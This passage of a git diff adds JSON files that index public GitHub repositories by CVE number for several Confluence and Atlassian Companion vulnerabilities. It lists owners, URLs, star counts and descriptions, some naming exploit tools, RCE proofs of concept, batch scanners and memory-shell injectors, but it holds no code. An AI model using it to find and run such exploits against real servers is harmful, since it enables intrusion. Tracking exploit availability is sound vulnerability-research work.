+ "description": "This script will inform the user if the Confluence instance is vulnerable, but it will not proceed with the exploitation steps.",
+ "fork": false,
+ "created_at": "2024-06-05T19:56:16Z",
+ "updated_at": "2024-06-20T19:03:26Z",
+ "pushed_at": "2024-06-20T19:03:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812408801,
+ "name": "cve-2023-22515",
+ "full_name": "xorbbo\/cve-2023-22515",
+ "owner": {
+ "login": "xorbbo",
+ "id": 172144274,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172144274?v=4",
+ "html_url": "https:\/\/github.com\/xorbbo"
+ },
+ "html_url": "https:\/\/github.com\/xorbbo\/cve-2023-22515",
+ "description": "NSE script to check if app is vulnerable to cve-2023-22515",
+ "fork": false,
+ "created_at": "2024-06-08T20:04:44Z",
+ "updated_at": "2024-06-08T20:10:35Z",
+ "pushed_at": "2024-06-08T20:09:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-22518.json b/2023/CVE-2023-22518.json
new file mode 100644
index 0000000000..c2e6ed28c9
--- /dev/null
+++ b/2023/CVE-2023-22518.json
@@ -0,0 +1,234 @@
+[
+ {
+ "id": 712257484,
+ "name": "CVE-2023-22518",
+ "full_name": "ForceFledgling\/CVE-2023-22518",
+ "owner": {
+ "login": "ForceFledgling",
+ "id": 92352077,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92352077?v=4",
+ "html_url": "https:\/\/github.com\/ForceFledgling"
+ },
+ "html_url": "https:\/\/github.com\/ForceFledgling\/CVE-2023-22518",
+ "description": "Improper Authorization Vulnerability in Confluence Data Center and Server + bonus 🔥",
+ "fork": false,
+ "created_at": "2023-10-31T05:35:00Z",
+ "updated_at": "2024-06-19T08:17:37Z",
+ "pushed_at": "2023-11-15T09:22:46Z",
+ "stargazers_count": 53,
+ "watchers_count": 53,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "atlassian",
+ "atlassian-confluence",
+ "attack",
+ "backdoor",
+ "confluence",
+ "critical",
+ "cve",
+ "exploit",
+ "exploiting",
+ "hacking",
+ "hacking-tool",
+ "improper",
+ "python",
+ "shell",
+ "vulnerabilities",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 53,
+ "score": 0,
+ "subscribers_count": 19
+ },
+ {
+ "id": 713624699,
+ "name": "CVE-2023-22518",
+ "full_name": "davidfortytwo\/CVE-2023-22518",
+ "owner": {
+ "login": "davidfortytwo",
+ "id": 85337431,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85337431?v=4",
+ "html_url": "https:\/\/github.com\/davidfortytwo"
+ },
+ "html_url": "https:\/\/github.com\/davidfortytwo\/CVE-2023-22518",
+ "description": "Checker for CVE-2023-22518 vulnerability on Confluence",
+ "fork": false,
+ "created_at": "2023-11-02T22:52:15Z",
+ "updated_at": "2024-05-17T17:07:38Z",
+ "pushed_at": "2024-05-21T06:45:36Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 714542407,
+ "name": "CVE-2023-22518",
+ "full_name": "RevoltSecurities\/CVE-2023-22518",
+ "owner": {
+ "login": "RevoltSecurities",
+ "id": 119435129,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4",
+ "html_url": "https:\/\/github.com\/RevoltSecurities"
+ },
+ "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2023-22518",
+ "description": "An Exploitation tool to exploit the confluence server that are vulnerable to CVE-2023-22518 Improper Authorization",
+ "fork": false,
+ "created_at": "2023-11-05T06:45:33Z",
+ "updated_at": "2024-06-16T00:35:15Z",
+ "pushed_at": "2023-11-05T07:08:41Z",
+ "stargazers_count": 36,
+ "watchers_count": 36,
+ "has_discussions": false,
+ "forks_count": 16,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 16,
+ "watchers": 36,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 716451139,
+ "name": "CVE-2023-22518",
+ "full_name": "0x0d3ad\/CVE-2023-22518",
+ "owner": {
+ "login": "0x0d3ad",
+ "id": 18898977,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18898977?v=4",
+ "html_url": "https:\/\/github.com\/0x0d3ad"
+ },
+ "html_url": "https:\/\/github.com\/0x0d3ad\/CVE-2023-22518",
+ "description": "Exploit CVE-2023-22518",
+ "fork": false,
+ "created_at": "2023-11-09T06:56:18Z",
+ "updated_at": "2024-06-19T08:17:33Z",
+ "pushed_at": "2023-11-09T07:42:04Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "atlassian",
+ "confluence",
+ "cve-2023-22518",
+ "exploit"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 724424925,
+ "name": "CVE-2023-22518",
+ "full_name": "C1ph3rX13\/CVE-2023-22518",
+ "owner": {
+ "login": "C1ph3rX13",
+ "id": 80873500,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4",
+ "html_url": "https:\/\/github.com\/C1ph3rX13"
+ },
+ "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-22518",
+ "description": "Confluence CVE-2023-22518",
+ "fork": false,
+ "created_at": "2023-11-28T03:33:16Z",
+ "updated_at": "2023-12-20T15:07:46Z",
+ "pushed_at": "2023-11-28T05:44:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 747208015,
+ "name": "CVE-2023-22518",
+ "full_name": "bibo318\/CVE-2023-22518",
+ "owner": {
+ "login": "bibo318",
+ "id": 56821442,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56821442?v=4",
+ "html_url": "https:\/\/github.com\/bibo318"
+ },
+ "html_url": "https:\/\/github.com\/bibo318\/CVE-2023-22518",
+ "description": "Lỗ hổng ủy quyền không phù hợp trong Trung tâm dữ liệu Confluence và Máy chủ + bugsBonus 🔥",
+ "fork": false,
+ "created_at": "2024-01-23T13:38:40Z",
+ "updated_at": "2024-01-24T10:15:44Z",
+ "pushed_at": "2024-01-24T02:04:40Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 775340661,
+ "name": "Exploit-CVE-2023-22518",
+ "full_name": "Lilly-dox\/Exploit-CVE-2023-22518",
+ "owner": {
+ "login": "Lilly-dox",
+ "id": 130746941,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130746941?v=4",
+ "html_url": "https:\/\/github.com\/Lilly-dox"
+ },
+ "html_url": "https:\/\/github.com\/Lilly-dox\/Exploit-CVE-2023-22518",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-21T07:55:00Z",
+ "updated_at": "2024-03-22T15:49:52Z",
+ "pushed_at": "2024-03-24T01:33:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-22524.json b/2023/CVE-2023-22524.json
new file mode 100644
index 0000000000..1f0ef4b00b
--- /dev/null
+++ b/2023/CVE-2023-22524.json
@@ -0,0 +1,66 @@
+[
+ {
+ "id": 731520651,
+ "name": "CVE-2023-22524",
+ "full_name": "imperva\/CVE-2023-22524",
+ "owner": {
+ "login": "imperva",
+ "id": 34535031,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34535031?v=4",
+ "html_url": "https:\/\/github.com\/imperva"
+ },
+ "html_url": "https:\/\/github.com\/imperva\/CVE-2023-22524",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-14T09:12:11Z",
+ "updated_at": "2023-12-15T16:41:50Z",
+ "pushed_at": "2023-12-20T11:01:52Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 731664456,
+ "name": "CVE-2023-22524",
+ "full_name": "ron-imperva\/CVE-2023-22524",
+ "owner": {
+ "login": "ron-imperva",
+ "id": 80413188,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80413188?v=4",
+ "html_url": "https:\/\/github.com\/ron-imperva"
+ },
+ "html_url": "https:\/\/github.com\/ron-imperva\/CVE-2023-22524",
+ "description": "Atlassian Companion RCE Vulnerability Proof of Concept",
+ "fork": false,
+ "created_at": "2023-12-14T15:33:11Z",
+ "updated_at": "2024-06-21T00:11:48Z",
+ "pushed_at": "2023-12-15T06:13:34Z",
+ "stargazers_count": 25,
+ "watchers_count": 25,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "atlassian",
+ "poc",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 25,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-22527.json b/2023/CVE-2023-22527.json
new file mode 100644
index 0000000000..70870a3067
--- /dev/null
+++ b/2023/CVE-2023-22527.json
@@ -0,0 +1,665 @@
+[
+ {
+ "id": 743909012,
+ "name": "CVE-2023-22527_Confluence_RCE",
+ "full_name": "Avento\/CVE-2023-22527_Confluence_RCE",
+ "owner": {
+ "login": "Avento",
+ "id": 13798539,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13798539?v=4",
+ "html_url": "https:\/\/github.com\/Avento"
+ },
+ "html_url": "https:\/\/github.com\/Avento\/CVE-2023-22527_Confluence_RCE",
+ "description": "CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC",
+ "fork": false,
+ "created_at": "2024-01-16T08:46:21Z",
+ "updated_at": "2024-04-16T21:49:09Z",
+ "pushed_at": "2024-01-23T09:57:31Z",
+ "stargazers_count": 24,
+ "watchers_count": 24,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 24,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 744029874,
+ "name": "patch-diff-CVE-2023-22527",
+ "full_name": "Sudistark\/patch-diff-CVE-2023-22527",
+ "owner": {
+ "login": "Sudistark",
+ "id": 31372554,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31372554?v=4",
+ "html_url": "https:\/\/github.com\/Sudistark"
+ },
+ "html_url": "https:\/\/github.com\/Sudistark\/patch-diff-CVE-2023-22527",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-16T13:50:49Z",
+ "updated_at": "2024-01-20T05:20:44Z",
+ "pushed_at": "2024-01-18T14:09:39Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 744449379,
+ "name": "CVE-2023-22527_Confluence_RCE",
+ "full_name": "ga0we1\/CVE-2023-22527_Confluence_RCE",
+ "owner": {
+ "login": "ga0we1",
+ "id": 96734525,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96734525?v=4",
+ "html_url": "https:\/\/github.com\/ga0we1"
+ },
+ "html_url": "https:\/\/github.com\/ga0we1\/CVE-2023-22527_Confluence_RCE",
+ "description": "CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC",
+ "fork": false,
+ "created_at": "2024-01-17T10:21:00Z",
+ "updated_at": "2024-01-22T12:45:12Z",
+ "pushed_at": "2024-01-17T07:12:18Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 746624870,
+ "name": "CVE-2023-22527",
+ "full_name": "Drun1baby\/CVE-2023-22527",
+ "owner": {
+ "login": "Drun1baby",
+ "id": 75228348,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75228348?v=4",
+ "html_url": "https:\/\/github.com\/Drun1baby"
+ },
+ "html_url": "https:\/\/github.com\/Drun1baby\/CVE-2023-22527",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-22T11:38:55Z",
+ "updated_at": "2024-01-23T01:52:40Z",
+ "pushed_at": "2024-01-22T12:07:37Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 746667961,
+ "name": "CVE-2023-22527",
+ "full_name": "cleverg0d\/CVE-2023-22527",
+ "owner": {
+ "login": "cleverg0d",
+ "id": 108401157,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108401157?v=4",
+ "html_url": "https:\/\/github.com\/cleverg0d"
+ },
+ "html_url": "https:\/\/github.com\/cleverg0d\/CVE-2023-22527",
+ "description": "A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.",
+ "fork": false,
+ "created_at": "2024-01-22T13:26:45Z",
+ "updated_at": "2024-01-23T02:20:48Z",
+ "pushed_at": "2024-01-22T13:31:42Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 746832699,
+ "name": "CVE-2023-22527",
+ "full_name": "thanhlam-attt\/CVE-2023-22527",
+ "owner": {
+ "login": "thanhlam-attt",
+ "id": 79523444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79523444?v=4",
+ "html_url": "https:\/\/github.com\/thanhlam-attt"
+ },
+ "html_url": "https:\/\/github.com\/thanhlam-attt\/CVE-2023-22527",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-22T19:02:59Z",
+ "updated_at": "2024-01-27T13:26:05Z",
+ "pushed_at": "2024-01-25T17:54:24Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 746974310,
+ "name": "CVE-2023-22527-POC",
+ "full_name": "Manh130902\/CVE-2023-22527-POC",
+ "owner": {
+ "login": "Manh130902",
+ "id": 93723285,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93723285?v=4",
+ "html_url": "https:\/\/github.com\/Manh130902"
+ },
+ "html_url": "https:\/\/github.com\/Manh130902\/CVE-2023-22527-POC",
+ "description": "A critical severity Remote Code Execution (RCE) vulnerability (CVE-2023-22527) was discovered in Confluence Server and Data Center. ",
+ "fork": false,
+ "created_at": "2024-01-23T02:17:36Z",
+ "updated_at": "2024-04-28T02:54:07Z",
+ "pushed_at": "2024-01-23T12:03:00Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 747056079,
+ "name": "CVE-2023-22527-confluence",
+ "full_name": "VNCERT-CC\/CVE-2023-22527-confluence",
+ "owner": {
+ "login": "VNCERT-CC",
+ "id": 94035613,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94035613?v=4",
+ "html_url": "https:\/\/github.com\/VNCERT-CC"
+ },
+ "html_url": "https:\/\/github.com\/VNCERT-CC\/CVE-2023-22527-confluence",
+ "description": "[Confluence] CVE-2023-22527 realworld poc",
+ "fork": false,
+ "created_at": "2024-01-23T07:10:55Z",
+ "updated_at": "2024-03-30T21:05:13Z",
+ "pushed_at": "2024-01-23T07:16:40Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 747075547,
+ "name": "CVE-2023-22527",
+ "full_name": "Vozec\/CVE-2023-22527",
+ "owner": {
+ "login": "Vozec",
+ "id": 61807609,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61807609?v=4",
+ "html_url": "https:\/\/github.com\/Vozec"
+ },
+ "html_url": "https:\/\/github.com\/Vozec\/CVE-2023-22527",
+ "description": "This repository presents a proof-of-concept of CVE-2023-22527",
+ "fork": false,
+ "created_at": "2024-01-23T08:06:15Z",
+ "updated_at": "2024-03-21T17:57:09Z",
+ "pushed_at": "2024-01-23T09:13:39Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 747093582,
+ "name": "CVE-2023-22527",
+ "full_name": "C1ph3rX13\/CVE-2023-22527",
+ "owner": {
+ "login": "C1ph3rX13",
+ "id": 80873500,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4",
+ "html_url": "https:\/\/github.com\/C1ph3rX13"
+ },
+ "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-22527",
+ "description": "Atlassian Confluence - Remote Code Execution (CVE-2023-22527)",
+ "fork": false,
+ "created_at": "2024-01-23T08:53:46Z",
+ "updated_at": "2024-02-12T18:35:12Z",
+ "pushed_at": "2024-01-23T09:04:15Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 747107640,
+ "name": "CVE-2023-22527",
+ "full_name": "Niuwoo\/CVE-2023-22527",
+ "owner": {
+ "login": "Niuwoo",
+ "id": 57100441,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57100441?v=4",
+ "html_url": "https:\/\/github.com\/Niuwoo"
+ },
+ "html_url": "https:\/\/github.com\/Niuwoo\/CVE-2023-22527",
+ "description": "POC",
+ "fork": false,
+ "created_at": "2024-01-23T09:28:53Z",
+ "updated_at": "2024-01-23T09:58:22Z",
+ "pushed_at": "2024-01-24T01:28:57Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 747142530,
+ "name": "CVE-2023-22527",
+ "full_name": "Chocapikk\/CVE-2023-22527",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-22527",
+ "description": "Atlassian Confluence - Remote Code Execution",
+ "fork": false,
+ "created_at": "2024-01-23T10:55:28Z",
+ "updated_at": "2024-05-29T16:58:07Z",
+ "pushed_at": "2024-01-23T11:30:10Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 747304649,
+ "name": "CVE-2023-22527",
+ "full_name": "RevoltSecurities\/CVE-2023-22527",
+ "owner": {
+ "login": "RevoltSecurities",
+ "id": 119435129,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4",
+ "html_url": "https:\/\/github.com\/RevoltSecurities"
+ },
+ "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2023-22527",
+ "description": "An Exploitation tool to exploit the confluence server that are vulnerable to CVE-2023-22527 leads to RCE",
+ "fork": false,
+ "created_at": "2024-01-23T17:07:15Z",
+ "updated_at": "2024-03-16T15:29:25Z",
+ "pushed_at": "2024-01-23T17:18:36Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 747516154,
+ "name": "CVE-2023-22527",
+ "full_name": "yoryio\/CVE-2023-22527",
+ "owner": {
+ "login": "yoryio",
+ "id": 134471901,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4",
+ "html_url": "https:\/\/github.com\/yoryio"
+ },
+ "html_url": "https:\/\/github.com\/yoryio\/CVE-2023-22527",
+ "description": "Exploit for CVE-2023-22527 - Atlassian Confluence Data Center and Server",
+ "fork": false,
+ "created_at": "2024-01-24T04:44:59Z",
+ "updated_at": "2024-06-05T12:35:06Z",
+ "pushed_at": "2024-03-15T05:15:05Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "atlassian-confluence",
+ "cve-2023-22527"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 747900455,
+ "name": "CVE-2023-22527",
+ "full_name": "Privia-Security\/CVE-2023-22527",
+ "owner": {
+ "login": "Privia-Security",
+ "id": 69091374,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69091374?v=4",
+ "html_url": "https:\/\/github.com\/Privia-Security"
+ },
+ "html_url": "https:\/\/github.com\/Privia-Security\/CVE-2023-22527",
+ "description": "CVE-2023-22527",
+ "fork": false,
+ "created_at": "2024-01-24T21:29:59Z",
+ "updated_at": "2024-05-10T11:45:23Z",
+ "pushed_at": "2024-01-25T06:39:02Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 748024139,
+ "name": "CVE-2023-22527-POC",
+ "full_name": "MaanVader\/CVE-2023-22527-POC",
+ "owner": {
+ "login": "MaanVader",
+ "id": 103140982,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103140982?v=4",
+ "html_url": "https:\/\/github.com\/MaanVader"
+ },
+ "html_url": "https:\/\/github.com\/MaanVader\/CVE-2023-22527-POC",
+ "description": "Atlassian Confluence Remote Code Execution(RCE) Proof Of Concept",
+ "fork": false,
+ "created_at": "2024-01-25T05:32:06Z",
+ "updated_at": "2024-01-28T09:48:06Z",
+ "pushed_at": "2024-01-25T10:42:35Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 748135321,
+ "name": "CVE-2023-22527",
+ "full_name": "adminlove520\/CVE-2023-22527",
+ "owner": {
+ "login": "adminlove520",
+ "id": 32920883,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32920883?v=4",
+ "html_url": "https:\/\/github.com\/adminlove520"
+ },
+ "html_url": "https:\/\/github.com\/adminlove520\/CVE-2023-22527",
+ "description": "CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC",
+ "fork": false,
+ "created_at": "2024-01-25T10:52:39Z",
+ "updated_at": "2024-04-02T17:41:19Z",
+ "pushed_at": "2024-01-25T10:54:57Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 751670668,
+ "name": "CVE-2023-22527",
+ "full_name": "YongYe-Security\/CVE-2023-22527",
+ "owner": {
+ "login": "YongYe-Security",
+ "id": 90460865,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90460865?v=4",
+ "html_url": "https:\/\/github.com\/YongYe-Security"
+ },
+ "html_url": "https:\/\/github.com\/YongYe-Security\/CVE-2023-22527",
+ "description": "CVE-2023-22527 Batch scanning",
+ "fork": false,
+ "created_at": "2024-02-02T04:20:14Z",
+ "updated_at": "2024-02-02T04:21:05Z",
+ "pushed_at": "2024-02-02T04:23:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 755982489,
+ "name": "CVE-2023-22527-Godzilla-MEMSHELL",
+ "full_name": "Boogipop\/CVE-2023-22527-Godzilla-MEMSHELL",
+ "owner": {
+ "login": "Boogipop",
+ "id": 114604850,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114604850?v=4",
+ "html_url": "https:\/\/github.com\/Boogipop"
+ },
+ "html_url": "https:\/\/github.com\/Boogipop\/CVE-2023-22527-Godzilla-MEMSHELL",
+ "description": "CVE-2023-22527 内存马注入工具",
+ "fork": false,
+ "created_at": "2024-02-11T16:46:55Z",
+ "updated_at": "2024-06-17T09:25:11Z",
+ "pushed_at": "2024-02-21T05:49:59Z",
+ "stargazers_count": 66,
+ "watchers_count": 66,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 66,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 763294385,
+ "name": "CVE-2023-22527-MEMSHELL",
+ "full_name": "M0untainShley\/CVE-2023-22527-MEMSHELL",
+ "owner": {
+ "login": "M0untainShley",
+ "id": 72058581,
